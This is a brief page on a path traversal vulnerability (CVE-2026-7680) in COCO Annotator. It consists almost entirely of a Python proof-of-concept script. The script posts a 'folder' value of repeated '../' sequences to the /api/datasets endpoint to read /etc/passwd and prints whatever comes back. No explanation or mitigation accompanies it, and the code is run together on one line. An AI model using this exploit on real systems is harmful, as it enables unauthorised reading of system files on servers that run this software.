CVE-2026-7680: COCO Annotator路径遍历漏洞

import requests # Target URL configuration target_url = "http://target-ip:port/api/datasets" # Malicious payload with path traversal sequence # Attempting to access /etc/passwd payload = { "folder": "/../../../../../../etc/passwd" } try: # Sending POST request to the vulnerable endpoint response = requests.post(target_url, data=payload) # Check response status if response.status_code == 200: print("[+] Potential successful exploitation detected.") print("[+] Response content:") print(response.text) else: print("[-] Exploit failed or target is not vulnerable.") print(f"[-] Status Code: {response.status_code}") except Exception as e: print(f"[!] An error occurred: {e}")